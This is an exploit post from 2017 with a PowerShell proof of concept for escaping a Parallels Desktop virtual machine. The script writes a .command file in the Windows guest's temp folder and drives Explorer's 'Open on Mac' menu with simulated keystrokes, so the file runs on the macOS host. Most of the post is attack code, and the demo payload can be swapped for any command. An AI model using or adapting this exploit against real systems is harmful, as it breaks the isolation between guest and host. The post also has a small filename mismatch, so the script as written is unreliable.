Parallels Desktop 12.2.0 Virtual Machine Escape
Posted on 05 June 2017
#[+] Title:A Parallels Desktop - Virtual Machine Escape #[+] Product: Parallels #[+] Vendor: http://www.parallels.com/products/desktop/ #[+] Affected Versions: All Version # # # Author : Mohammad Reza Espargham # Linkedin : https://ir.linkedin.com/in/rezasp # E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com # Website : www.reza.es # Twitter : https://twitter.com/rezesp # FaceBook : https://www.facebook.com/reza.espargham # Github : github.com/rezasp # # # #There is a security issue in the shared folder implementation in Parallels Desktop #DLL : PrlToolsShellExt.dll 10.2.0 (28956) #prl_tg Driver #Very simple exploit with powershell #powershell.exe poc.ps1 #Write OSX Executable file in temp [io.file]::WriteAllText($env:temp + ' 3z4.command',"Say 'You are hacked by 1337'") add-type -AssemblyName microsoft.VisualBasic add-type -AssemblyName System.Windows.Forms #open temp in explorer explorer $env:temp #wait for 500 miliseconds start-sleep -Milliseconds 500 #select Temp active window [Microsoft.VisualBasic.Interaction]::AppActivate("Temp") #find r3z4.command file [System.Windows.Forms.SendKeys]::SendWait("r3z4") #right click [System.Windows.Forms.SendKeys]::SendWait("+({F10})") #goto "Open on Mac" in menu [System.Windows.Forms.SendKeys]::SendWait("{DOWN}") [System.Windows.Forms.SendKeys]::SendWait("{DOWN}") [System.Windows.Forms.SendKeys]::SendWait("{DOWN}") #Click Enter [System.Windows.Forms.SendKeys]::SendWait("~") #Enjoy ;)s
